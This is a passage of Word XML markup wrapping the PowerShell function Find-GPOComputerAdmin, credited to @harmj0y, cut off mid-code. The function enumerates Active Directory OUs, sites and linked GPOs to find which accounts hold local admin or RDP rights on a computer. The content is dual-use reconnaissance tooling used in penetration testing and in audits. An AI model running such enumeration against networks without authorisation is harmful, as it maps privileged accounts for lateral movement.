    <w:p w14:paraId="5F775909" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        local group for the machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009F8E55" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0424011D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Author: @harmj0y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744B6BC8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        License: BSD 3-Clause</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C72D07A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Required Dependencies: Get-NetComputer, Get-SiteName, Get-NetSite, Get-NetGPOGroup, Get-ADObject, Get-NetGroupMember, Convert-SidToName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB49371" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Optional Dependencies: None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49891597" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2B0E1CE5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .DESCRIPTION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57774B44" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168F53E3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        If a -ComputerName is specified, retrieve the complete computer object, attempt to</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1391D953" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        determine the OU the computer is a part of. Then resolve the computer's site name with</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4AFEEC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Get-SiteName and retrieve all sites object Get-NetSite. For those results, attempt to</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21227F4D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        enumerate all linked GPOs and associated local group settings with Get-NetGPOGroup. For</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437A5F1A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        each resulting GPO group, resolve the resulting user/group name to a full AD object and</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489F2FC7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        return the results. This will return the domain objects that are members of the specified</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF8BC23" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        -LocalGroup for the given computer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A565232" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0C9C2CF2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Inverse of Find-GPOLocation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E74FF27" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="496D60B2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ComputerName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04236B3A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5DD54C63" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The computer to determine local administrative access to.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE05445" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6B0DC0E4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER OUName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09ADE544" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6F410DAF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        OU name to determine who has local adminisrtative acess to computers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB6E451" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        within it. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C61C713" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2E1F00F7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7674CE22" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7A14D659" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Optional domain the computer/OU exists in, defaults to the current domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C701909" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="437D15C2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER DomainController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B882C1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="317CE055" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Domain controller to reflect LDAP queries through.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB6FBE4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6CEA1997" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Recurse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE4A5CC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3DB96B56" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Switch. If a returned member is a group, recurse and get all members.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D578F32" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="731D398B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER LocalGroup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4335752B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="74DCCD35" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The local group to check access against.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B95B3F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Can be "Administrators" (S-1-5-32-544), "RDP/Remote Desktop Users" (S-1-5-32-555),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42EE566E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        or a custom local SID.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C768BEF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Defaults to local 'Administrators'.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE31EB8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="761E834F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER UsePSDrive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA06151" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="22C21E65" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Switch. Mount any found policy files with temporary PSDrives.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C14C47D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="13C2A0F1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER PageSize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA4F380" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4F1E46F2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The PageSize to set for the LDAP searcher object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57949CC3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7B4EBF6D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1712A998" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4200DC66" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Find-GPOComputerAdmin -ComputerName WINDOWS3.dev.testlab.local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36140707" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395E6671" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Finds users who have local admin rights over WINDOWS3 through GPO correlation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758CE127" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="38A688C8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67DA44FC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3B9559B4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Find-GPOComputerAdmin -ComputerName WINDOWS3.dev.testlab.local -LocalGroup RDP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9F2647" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538C7478" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Finds users who have RDP rights over WINDOWS3 through GPO correlation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5CF10A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E97F77B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="06FE0447" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    [CmdletBinding()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F6BC0F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    Param (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699961FD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(ValueFromPipeline=$True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C511F3F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2882CA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ComputerName,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202E3D20" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="28EBC1E1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="777992A0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $OUName,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFB05AE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="721599EF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41BF48BB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Domain,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6255FEC8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="181C1820" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D63275" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $DomainController,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5A7A23" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="560C5D11" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335B328A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        $Recurse,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAE980C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="610BDBE0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFF0036" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $LocalGroup = 'Administrators',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B7D74F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="22CBB450" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD126E4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $UsePSDrive,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21CE041F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7780E682" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateRange(1,10000)] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271813D9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Int]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BE20CE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $PageSize = 200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55FD68C9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A9BAB6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0B6CD434" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    process {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69157A92" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780C2F44" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if(!$ComputerName -and !$OUName) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067E4A0E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            Throw "-ComputerName or -OUName must be provided"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35EBA26D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC2F0F0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="70A1E9A5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $GPOGroups = @()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8D6391" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="613178A2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if($ComputerName) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41EDB937" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Computers = Get-NetComputer -ComputerName $ComputerName -Domain $Domain -DomainController $DomainController -FullData -PageSize $PageSize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E74F11" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5FD12214" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if(!$Computers) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75155079" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                throw "Computer $ComputerName in domain '$Domain' not found! Try a fully qualified host name"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBD31C9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2BC15C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA5E25B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $TargetOUs = @()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E98152" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            ForEach($Computer in $Computers) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E12EC79" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                # extract all OUs a computer is a part of</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4706B4F3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $DN = $Computer.distinguishedname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6758A3B2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4E8CC033" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $TargetOUs += $DN.split(",") | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B64AE2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    if($_.startswith("OU=")) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54637839" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $DN.substring($DN.indexof($_))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0707FE6C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B8354C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE18A10" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407A5F67" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="31AAD939" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # enumerate any linked GPOs for the computer's site</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025C1B47" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $ComputerSite = (Get-SiteName -ComputerName $ComputerName).SiteName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228F35C8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if($ComputerSite -and ($ComputerSite -notlike 'Error*')) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0EFBF8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $GPOGroups += Get-NetSite -SiteName $ComputerSite -FullData | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E5406C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    if($_.gplink) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE5354B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $_.gplink.split("][") | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3A51B7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            if ($_.startswith("LDAP")) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715DC0A7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                                $_.split(";")[0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B4CB84" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F062BE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F08DA0F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A22C6B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
